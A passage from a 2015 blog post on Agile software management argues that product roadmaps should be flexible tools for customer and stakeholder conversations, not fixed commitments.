Generally it’s proven out that Agile is much more efficient and produces better products that meet customers’ needs much better than the old waterfall execute the requirements approach. But if upper management wants to know what R&D is doing they have to pay attention since things are fluid and always changing. This can be hard to accept, but now its being found that Agile can be applied to other parts of the organization and rather than older parts of the company dragging down the Agile parts, now all departments are going to Agile and its working very well for modern companies. In fact many people now believe that if a company doesn’t make this transition then it will become less and less competitive. The sad part is that Agile produces far better artifacts showing the progress of a project, you just need to learn how to use the tracking software to see them (another wastage is producing specialized reports just for upper management consumption).

Customer Connectedness

In the end, the goal is to be as customer connected as possible. Always working on the item in the product backlog with the highest value for the customer. This is now a proven principle for success. Dictating to customers what is good for them will just alienate your customers and send them elsewhere.

Creating a general roadmap that is used to get customer feedback and buy-in is just one tool of many to being a better customer connected company. And again the key secret ingredient is always adapting to change and not becoming fixed in your direction.

Of course when talking to customers and often other stakeholders, they will start out with how they need everything yesterday. But you have to steer the conversation to choosing priorities and not being brow-beaten into accepting that any estimates need to be shorter.

Summary

Roadmaps are great tools for having a conversation with stakeholders on the direction of a product. You just have to be careful not to fall into the trap that the roadmap is somehow a commitment that can never change. If done properly it can serve quite a few goals that are fully compatible with an Agile methodology.

If you are presenting a roadmap at a conference or WebEx, always prefix the presentation with that this is our current thinking and that we are always looking for feedback and ways to make the roadmap better.

 

Written by smist08

October 28, 2015 at 8:05 pm